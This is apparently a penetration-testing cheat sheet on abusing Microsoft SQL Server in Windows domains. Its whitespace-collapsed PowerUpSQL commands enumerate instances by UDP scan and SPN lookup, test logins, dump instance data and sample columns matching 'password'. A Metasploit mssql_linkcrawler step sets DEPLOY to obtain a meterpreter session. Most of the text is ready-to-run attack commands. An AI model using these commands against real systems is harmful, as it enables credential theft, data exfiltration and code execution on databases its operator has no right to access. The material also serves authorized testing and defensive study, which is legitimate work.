The PowerShell module PowerUpSQL is very useful in this case.
Copy
Import-Module.\PowerupSQL.psd1
Enumerating from the network without domain session
# Get local MSSQL instance (if any)Get-SQLInstanceLocalGet-SQLInstanceLocal|Get-SQLServerInfo#If you don't have an AD account, you can try to find MSSQL scanning via UDP#First, you will need a list of hosts to scanGet-Contentc:\temp\computers.txt|Get-SQLInstanceScanUDP–Verbose–Threads10#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them#The discovered MSSQL servers must be on the file: C:\temp\instances.txtGet-SQLInstanceFile-FilePathC:\temp\instances.txt|Get-SQLConnectionTest-Verbose-Usernametest-Passwordtest
Enumerating from inside the domain
# Get local MSSQL instance (if any)Get-SQLInstanceLocalGet-SQLInstanceLocal|Get-SQLServerInfo#Get info about valid MSQL instances running in the domain#This looks for SPNs that start with MSSQL (not always is a MSSQL running instance)Get-SQLInstanceDomain|Get-SQLServerinfo-Verbose#Test connections with each oneGet-SQLInstanceDomain|Get-SQLConnectionTestThreaded-verbose#Try to connect and obtain info from each MSSQL server (also useful to check connectivity)Get-SQLInstanceDomain|Get-SQLServerInfo-Verbose# Get DBs, test connections and get info in OnelinerGet-SQLInstanceDomain|Get-SQLConnectionTest|?{ $_.Status-eq"Accessible"}|Get-SQLServerInfo
MSSQL Basic Abuse
Access DB
#Perform a SQL queryGet-SQLQuery-Instance"sql.domain.io,1433"-Query"select @@servername"#Dump an instance (a lotof CVSs generated in current dir)Invoke-SQLDumpInfo-Verbose-Instance"dcorp-mssql"# Search keywords in columns trying to access the MSSQL DBs## This won't use trusted SQL linksGet-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
Metasploit
You can easily check for trusted links using Metasploit.
Copy
#Set username, password, windows auth (if using AD), IP...msf> use exploit/windows/mssql/mssql_linkcrawler[msf>set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
Notice that Metasploit will try to abuse only the openquery()function in MSSQL (so, if you can't execute a command with openquery() you will need to try the EXECUTE method manually to execute commands, see more below.)
